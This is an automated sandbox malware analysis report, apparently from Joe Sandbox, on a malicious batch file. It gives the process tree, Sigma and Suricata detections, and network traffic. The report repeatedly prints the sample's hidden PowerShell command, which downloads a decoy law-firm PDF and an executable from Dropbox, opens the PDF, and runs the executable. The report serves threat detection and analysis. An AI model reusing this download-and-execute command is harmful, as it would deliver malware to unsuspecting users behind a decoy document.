Edit tour

Windows Analysis Report
FLKCAS1DzH.bat

Overview

General Information

Sample name:	FLKCAS1DzH.bat renamed because original name is a hash value
Original sample name:	17ece0b40e0d30e590955d79b4de9541.bat
Analysis ID:	1581600
MD5:	17ece0b40e0d30e590955d79b4de9541
SHA1:	673913590c7bd10e084ec3e3ac49e2176cfba2bc
SHA256:	2d3151f761001ee38041d5b55ef6e3cc19e76b688bc42a9648d6f64a326dc063
Tags:	batuser-abuse_ch
Infos:

Detection

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

AI detected suspicious sample

Creates HTML files with .exe extension (expired dropper behavior)

Loading BitLocker PowerShell Module

Maps a DLL or memory area into another process

Suspicious powershell command line found

AV process strings found (often used to terminate AV products)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

cmd.exe (PID: 7260 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FLKCAS1DzH.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7316 cmdline: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE" MD5: 04029E121A0CFA5991749937DD22A1D9)

msedge.exe (PID: 7540 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\996293227.pdf MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7828 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2032,i,3779316506430683619,1853304798482195837,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

svchost.exe (PID: 7692 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

msedge.exe (PID: 7840 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate "C:\Users\user\AppData\Local\Temp\996293227.pdf" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8160 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2096,i,8933709296785458366,521354130551247293,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8548 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=6536 --field-trial-handle=2096,i,8933709296785458366,521354130551247293,262144 /prefetch:6 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8620 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6772 --field-trial-handle=2096,i,8933709296785458366,521354130551247293,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8652 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6852 --field-trial-handle=2096,i,8933709296785458366,521354130551247293,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

identity_helper.exe (PID: 9116 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7740 --field-trial-handle=2096,i,8933709296785458366,521354130551247293,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)

identity_helper.exe (PID: 9136 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7740 --field-trial-handle=2096,i,8933709296785458366,521354130551247293,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)

msedge.exe (PID: 7376 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6928 --field-trial-handle=2096,i,8933709296785458366,521354130551247293,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7556 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7584 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2036,i,15589961610150793122,17070450829670239712,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7188 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 3756 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=2064,i,10732426211297958071,16910545883878642092,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

cleanup

Sigma Signatures

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE", CommandLine: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FLKCAS1DzH.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7260, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE", ProcessId: 7316, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE", CommandLine: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FLKCAS1DzH.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7260, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE", ProcessId: 7316, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE", CommandLine: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FLKCAS1DzH.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7260, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE", ProcessId: 7316, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7692, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:45:39.833516+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49731	162.125.65.18	443	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:45:33.954309+0100	1810000	1	Potentially Bad Traffic	192.168.2.4	49730	162.125.65.18	443	TCP
2024-12-28T09:45:39.833516+0100	1810000	1	Potentially Bad Traffic	192.168.2.4	49731	162.125.65.18	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: FLKCAS1DzH.bat

Virustotal: Detection: 17%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: unknown

HTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.4:49730 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb*~yq/ source: powershell.exe, 00000002.00000002.1920514098.0000023965D94000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb.} source: powershell.exe, 00000002.00000002.1920514098.0000023965D94000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1918892718.0000023965CB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1920514098.0000023965D94000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdby~mq source: powershell.exe, 00000002.00000002.1919183779.0000023965CE3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1918892718.0000023965CB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1921709834.0000023965E2F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1920514098.0000023965D94000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1919183779.0000023965D07000.00000004.00000020.00020000.00000000.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49731 -> 162.125.65.18:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49730 -> 162.125.65.18:443

Creates HTML files with .exe extension (expired dropper behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: 873972660.exe.2.dr

Source: Joe Sandbox View	IP Address: 162.125.65.18 162.125.65.18
Source: Joe Sandbox View	IP Address: 23.219.161.132 23.219.161.132
Source: Joe Sandbox View	IP Address: 162.159.61.3 162.159.61.3

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic

Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 162.125.65.18:443

Source: global traffic	HTTP traffic detected: GET /scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: OPTIONS /api/report?cat=bingbusiness HTTP/1.1Host: bzib.nelreports.netConnection: keep-aliveOrigin: https://business.bing.comAccess-Control-Request-Method: POSTAccess-Control-Request-Headers: content-typeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: POST /api/report?cat=bingbusiness HTTP/1.1Host: bzib.nelreports.netConnection: keep-aliveContent-Length: 466Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.164.105
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.164.105
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.161.132
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.161.132
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.161.132
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.201.12
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.201.12
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.201.12
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.161.132
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.161.132
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.161.132
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.201.12
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.201.12
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.201.12
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.161.132
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.161.132
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.161.132
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.161.132
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.161.132
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.161.132
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.161.132
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.161.132
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.161.132
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.161.132
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.201.12
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8

Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: font-src https://* data: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; base-uri 'self' ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; img-src https:// data: blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-ancestors 'self' https://.dropbox.com ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: equals www.yahoo.com (Yahoo)
